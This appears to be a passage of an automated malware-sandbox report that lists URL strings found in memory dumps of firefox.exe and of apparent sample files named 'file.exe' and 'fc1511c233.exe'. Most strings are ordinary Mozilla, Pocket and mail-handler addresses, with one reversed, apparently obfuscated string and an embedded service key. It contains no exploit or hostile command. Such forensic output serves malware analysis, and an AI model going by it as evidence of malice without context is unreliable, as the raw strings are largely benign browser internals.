                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtabcd09ae95-e2cf-4b8b-8929-791b0
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3615821219.000001F9461C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabresource://activity-stream/lib/HighlightsFeed.j
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
                          Source: firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3664339405.000001F94B053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreapplication/x-www-form-urlencoded;
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morehome-prefs-recommended-by-learn-more
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://getpocket.com/read/$
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmp, firefox.exe, 0000002F.00000002.3615821219.000001F9461C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendations
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendationsPocket
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendationsS
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendationsS7
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
                          Source: firefox.exe, 0000002F.00000002.3449451323.000001F93FF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/
                          Source: firefox.exe, 0000002F.00000002.3616491974.000001F9463B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
                          Source: firefox.exe, 0000002F.00000002.3616491974.000001F9463B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
                          Source: firefox.exe, 0000002F.00000003.3362544511.000001F94290F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3451619202.000001F942070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3361530870.000001F942700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3363111385.000001F942931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshots
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshotsexperiment-apis/aboutConfigPrefs.jsexperiment-apis/sy
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshotshandleTopSitesOrganicImpressionStatsThomas
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla/webcompat-reporter
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla/webcompat-reporterWikipedia
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3652668486.000001F94AFF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3652668486.000001F94AFF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://github.com/zertosh/loose-envify)
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3779966490.00001BE444004000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com
                          Source: firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3652668486.000001F94AFF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gpuweb.github.io/gpuweb/
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://help.getpocket.com/article/1142-firefox-new-tab-recommendations-faq
                          Source: firefox.exe, 0000002F.00000002.3437343071.000001F932811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881a
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img-getpocket.cdn.mozilla.net/
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://img-getpocket.cdn.mozilla.net/7
                          Source: firefox.exe, 0000002F.00000002.3442280011.000001F93E0AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3584635396.000001F945EAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submitDISCOVERY_STREAM_IMPRESSION_STATSDISCOVERY_STREAM_PERSO
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submits
                          Source: firefox.exe, 0000002F.00000002.3466728259.000001F9438A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2019-09/schema
                          Source: firefox.exe, 0000002F.00000002.3453979007.000001F942795000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3466017028.000001F9437AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com
                          Source: firefox.exe, 0000002F.00000002.3466017028.000001F943734000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443955333.000001F93EAB0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%Closing
                          Source: firefox.exe, 0000002F.00000002.3462736194.000001F94354D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
                          Source: firefox.exe, 0000002F.00000002.3777834058.00001AB50B63E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3584635396.000001F945E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3584635396.000001F945E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.combug-1703186-rollout-http3-support-release-88-89extensions.langpacks
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940981000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3449451323.000001F93FF22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FCAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sFailed
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://outlook.live.com/default.aspx?rru=compose&
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940981000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%s
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%shttp://poczta.interia.pl/mh/?mailto=%shttp://win.mail.ru/cgi-bin/
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%spdfjs.previousHandler.alwaysAskBeforeHandling
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940981000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3437343071.000001F9328D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest5
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestresource://activity-stream/lib/RecommendationProvi
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3444990370.000001F93EEB9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F9409FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443090623.000001F93E1B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com
                          Source: firefox.exe, 0000002F.00000002.3745579192.00000DA622A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org/
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: https://mozilla.org/W
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mzl.la/3NS9KJd
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ok.ru/
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940981000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940981000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443955333.000001F93EAB0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com/
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3444990370.000001F93EEB9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F9409FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443090623.000001F93E1B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com
                          Source: firefox.exe, 0000002F.00000003.3363111385.000001F942931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/Wikipedia
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/shims/google-safeframe.html
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/shims/google-safeframe.htmlshims/mochitest-shim-3.jsexperiment-apis/
                          Source: firefox.exe, 0000002F.00000002.3466017028.000001F943757000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/facebook.svg
                          Source: firefox.exe, 0000002F.00000002.3466017028.000001F943757000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svg
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://snippets.mozilla.com/show/
                          Source: firefox.exe, 0000002F.00000002.3689565654.000001F94B46B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com
                          Source: firefox.exe, 0000002F.00000002.3689565654.000001F94B46B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3584635396.000001F945E60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_ke
                          Source: firefox.exe, 0000002F.00000002.3689565654.000001F94B46B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3652668486.000001F94AF6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3584635396.000001F945EAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3652668486.000001F94AF1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/user
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/user_convertPlainTextDocument
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/user_convertPlainTextDocument_getReadingSpeedForLanguage
                          Source: firefox.exe, 0000002F.00000002.3532560514.000001F944835000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F944710000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
                          Source: firefox.exe, 0000002F.00000002.3530700311.000001F944581000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F9445E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3532560514.000001F944835000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F944710000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94470A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F944703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F9409BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F9409FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443090623.000001F93E1B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
                          Source: firefox.exe, 0000002F.00000003.3413609052.000001F944259000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3502039099.000001F944259000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443955333.000001F93EAB0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/captive-portal
                          Source: fc1511c233.exe, 0000001B.00000003.3316881366.0000000005E27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-help
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helptransitionState
                          Source: firefox.exe, 0000002F.00000002.3551249065.000001F944A03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaPlatformDecoderNotFound
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaWMFNeeded
                          Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
                          Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3571108437.000001F944EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
                          Source: firefox.exe, 0000002F.00000002.3640517520.000001F94AEC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingschrome://browser/content/mi
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causeschrome://browser/content/mi
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/website-translation
                          Source: fc1511c233.exe, 0000001B.00000003.3316881366.0000000005E27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                          Source: file.exe, 00000000.00000003.2614786623.0000000023E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                          Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.3664339405.000001F94B053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
                          Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
                          Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.3664339405.000001F94B053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
                          Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F9409E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F9409FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443090623.000001F93E1B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.com
